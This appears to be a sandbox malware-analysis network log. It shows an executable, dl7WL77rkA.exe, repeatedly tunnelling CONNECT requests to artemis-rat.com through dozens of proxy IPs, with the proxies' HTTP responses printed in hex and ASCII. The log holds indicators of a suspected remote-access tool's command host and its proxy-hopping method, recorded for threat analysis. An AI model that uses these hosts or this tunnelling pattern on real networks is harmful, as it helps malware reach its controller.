                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.332768917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.650299072 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1847192.168.2.554988103.182.112.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.334135056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.201996088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.487344027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989512920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.306721926 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1848192.168.2.555145172.67.182.85803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341432095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.495811939 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1849192.168.2.555147104.19.5.247803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341674089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.496299982 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1850192.168.2.55507462.33.53.24831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341902018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.737667084 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1851192.168.2.55508345.11.95.16660143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.364449978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083447933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.843261957 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1852192.168.2.55514323.94.214.890543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.364850044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.706516981 CET34INHTTP/1.1 503 Service Unavailable


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1853192.168.2.554201109.238.181.5380833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.365632057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405160904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.807801008 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 28 Aug 1972 02:44:33 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 28 Aug 1972 02:44:33 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1854192.168.2.554976103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.366590977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1855192.168.2.555110154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.399254084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1856192.168.2.55431651.89.173.40204353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.407978058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1857192.168.2.55433951.75.125.20827363876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.409012079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083405972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014702082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014609098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717869043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.475100040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.205236912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1858192.168.2.55513838.162.15.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.410212994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889553070 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1859192.168.2.55512839.105.27.3031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.429590940 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.811192036 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1860192.168.2.555149194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.435410023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1861192.168.2.555112178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.448534966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1862192.168.2.555155194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.453797102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1863192.168.2.55346443.255.113.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.454054117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092693090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1864192.168.2.55349645.240.182.12019813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.456950903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594574928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702393055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.708508968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1865192.168.2.555115148.72.215.230443873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.460056067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1866192.168.2.555126123.126.158.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.464337111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
